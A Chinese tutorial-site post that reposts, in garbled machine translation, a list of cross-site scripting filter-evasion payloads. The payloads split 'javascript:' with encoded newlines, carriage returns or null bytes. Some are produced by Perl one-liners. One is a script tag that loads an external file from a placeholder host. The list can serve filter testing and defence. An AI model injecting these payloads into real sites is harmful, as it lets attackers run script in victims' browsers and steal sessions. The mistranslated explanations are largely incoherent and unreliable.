为了账号安全,请及时绑定邮箱和手机立即绑定

xss***代码下

标签:
Html/CSS

1.分手XSS嵌入换行符。一些网站声称任何识字课09-13(十进制)将会为这次袭击。那是不正确的。只有09(横向标签),10(换行符),13(回车)工作。看到ascii图的更多细节

代码:<IMG SRC="jav&#x0A;ascript:alert('XSS');">

2.嵌入式回车分手XSS(注:上述我使这些字符串超过他们必须因为零点可以省略。我经常看见过滤器假定十六进制12编码必须两个或三个字符,真正的规则是1字符

 代码:<IMG SRC="jav&#x0D;ascript:alert('XSS');">

3.注射用折线JavaScript ASCII回车(同上只有一个更极端的例子XSS矢量)这不是空间就是这三个角色如上所述
 代码:<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
4.空分割JavaScript指令

代码:perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

5.打破了跨站脚本无效向量。这是一种很罕见的XSS攻击载体使用空字符。你可以把HTML本身使用相同的nulls

代码:perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

6.空间和meta识字课之前在图像JavaScript XSS(这是有益的,如果这个模式匹配不考虑空间单词“JavaScript:”——因为这不会是正确的,而且可以提供一种错误的假设,我们不可能拥有这样一个之间的空间报价和“JavaScript:“关键字

代码:<IMG SRC=" &#14;  javascript:alert('XSS');">

7.Non-alpha-non-digit XSS。 阅读时,我虽然HTML解析我发现呈non-alpha-non-digit不是有效的关键字,因此一个HTML后认为它是一个空格或一个HTML标签后太表征。问题在于某些XSS过滤器假设标签他们寻找碎空白。例如“s”<脚本\ != " <脚本/ XSS \ s
代码:<SCRIPT/XSS SRC="www.xxx.com/xss.js"></SCRIPT>

点击查看更多内容
TA 点赞

若觉得本文不错,就分享一下吧!

评论

作者其他优质文章

正在加载中
  • 推荐
  • 评论
  • 收藏
  • 共同学习,写下你的评论
感谢您的支持,我会继续努力的~
扫码打赏,你说多少就多少
赞赏金额会直接到老师账户
支付方式
打开微信扫一扫,即可进行扫码打赏哦
今天注册有机会得

100积分直接送

付费专栏免费学

大额优惠券免费领

立即参与 放弃机会
意见反馈 帮助中心 APP下载
官方微信

举报

0/150
提交
取消